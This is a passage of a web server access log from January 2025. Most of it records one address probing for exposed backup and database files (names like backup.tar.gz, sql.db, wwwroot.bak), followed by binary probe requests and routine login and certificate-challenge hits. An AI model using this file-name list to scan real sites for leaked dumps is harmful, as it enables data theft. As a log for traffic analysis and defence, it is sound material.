HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:28 -0500] "GET /upload.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:29 -0500] "GET /package.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:29 -0500] "GET /old.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:29 -0500] "GET /test.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:29 -0500] "GET /root.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:30 -0500] "GET /beifen.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:30 -0500] "GET /216.108.230.89.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:30 -0500] "GET /sql.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:31 -0500] "GET /www.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:31 -0500] "GET /wwwroot.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:32 -0500] "GET /index.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:32 -0500] "GET /backup.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:32 -0500] "GET /back.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:32 -0500] "GET /data.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:33 -0500] "GET /web.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:33 -0500] "GET /db.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:33 -0500] "GET /database.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:33 -0500] "GET /ftp.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:34 -0500] "GET /admin.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:34 -0500] "GET /upload.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:35 -0500] "GET /package.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:35 -0500] "GET /old.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:36 -0500] "GET /test.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:36 -0500] "GET /root.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:37 -0500] "GET /beifen.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:37 -0500] "GET /216.108.230.89.tar.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:37 -0500] "GET /sql.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:37 -0500] "GET /www.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:38 -0500] "GET /wwwroot.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:38 -0500] "GET /index.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:38 -0500] "GET /backup.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:39 -0500] "GET /back.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:39 -0500] "GET /data.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:39 -0500] "GET /web.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:40 -0500] "GET /db.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:40 -0500] "GET /database.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:40 -0500] "GET /ftp.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:41 -0500] "GET /admin.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:41 -0500] "GET /upload.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:42 -0500] "GET /package.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:42 -0500] "GET /old.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:42 -0500] "GET /test.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:43 -0500] "GET /root.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:43 -0500] "GET /beifen.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:43 -0500] "GET /216.108.230.89.db HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:43 -0500] "GET /sql.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:44 -0500] "GET /www.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:44 -0500] "GET /wwwroot.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:44 -0500] "GET /index.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:45 -0500] "GET /backup.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:45 -0500] "GET /back.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:45 -0500] "GET /data.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:45 -0500] "GET /web.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:46 -0500] "GET /db.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:46 -0500] "GET /database.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:47 -0500] "GET /ftp.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:47 -0500] "GET /admin.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:48 -0500] "GET /upload.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:48 -0500] "GET /package.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:48 -0500] "GET /old.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:49 -0500] "GET /test.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:49 -0500] "GET /root.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:49 -0500] "GET /beifen.bak HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:49 -0500] "GET /216.108.230.89.bak HTTP/1.1" 302 - 127.0.0.1 - - [15/Jan/2025:00:41:39 -0500] "GET /?doact=yyy18 HTTP/1.1" 302 - 127.0.0.1 - - [15/Jan/2025:00:41:39 -0500] "GET /login HTTP/1.1" 200 4254 205.210.31.56 - - [15/Jan/2025:00:46:06 -0500] "H?h.Wqc`~\6LY W |`-:uE"*R{pY0zɲv&+/,0̨̩ " 400 - 205.210.31.56 - - [15/Jan/2025:00:46:06 -0500] "]P֛/M5;(Vt`sX̮h/+0,'# ($ " 400 - 127.0.0.1 - - [15/Jan/2025:01:19:02 -0500] "GET /.well-known/acme-challenge/THSFCEBAHK9Y5OTEZE87Z78X5UH-BQZT HTTP/1.1" 200 2145 127.0.0.1 - - [15/Jan/2025:01:19:02 -0500] "GET /.well-known/acme-challenge/IQZPN7EEV7MVJ01N-TXH05K7CIBC2LZ3 HTTP/1.1" 200 2145 127.0.0.1 - - [15/Jan/2025:01:19:02 -0500] "GET /.well-known/acme-challenge/N0OANGJXI12VR8RH6MG31X-_SEYKOTLY HTTP/1.1" 200 2145 127.0.0.1 - - [15/Jan/2025:01:19:02 -0500] "GET /.well-known/acme-challenge/MU8FU_E4K0KZXWWEP_P1OV8BJU26YYMW HTTP/1.1" 200 2145 127.0.0.1 - - [15/Jan/2025:01:19:03 -0500] "GET /.well-known/acme-challenge/YWRAPFZF83VZ_KTJV6PDNH7T-8C6WCVQ HTTP/1.1" 200 2145 127.0.0.1 - - [15/Jan/2025:01:49:52 -0500] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [15/Jan/2025:01:49:52 -0500] "GET /login HTTP/1.1" 200 4254 127.0.0.1 - - [15/Jan/2025:01:49:54 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [15/Jan/2025:01:49:56 -0500] "GET /login HTTP/1.1" 200 4254 127.0.0.1 - - [15/Jan/2025:02:01:35 -0500] "GET /?C=N%3BO%3DD HTTP/1.1" 302 - 127.0.0.1 - - [15/Jan/2025:02:01:36 -0500] "GET /login HTTP/1.1" 200 4254 127.0.0.1 - - [15/Jan/2025:02:22:38 -0500] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [15/Jan/2025:02:28:07 -0500] "GET /wp-content/themes/SqueezeTheme/style.css HTTP/1.1" 200 2145 51.81.111.12 - - [15/Jan/2025:02:43:55 -0500] "GET / HTTP/1.1" 302 - 135.148.10.173 - - [15/Jan/2025:02:52:05 -0500] "GET /favicon.ico HTTP/1.1" 302 - 135.148.10.174 - - [15/Jan/2025:02:52:08 -0500] "GET /login HTTP/1.1" 200 4254 51.178.236.253 - - [15/Jan/2025:02:53:11 -0500] "P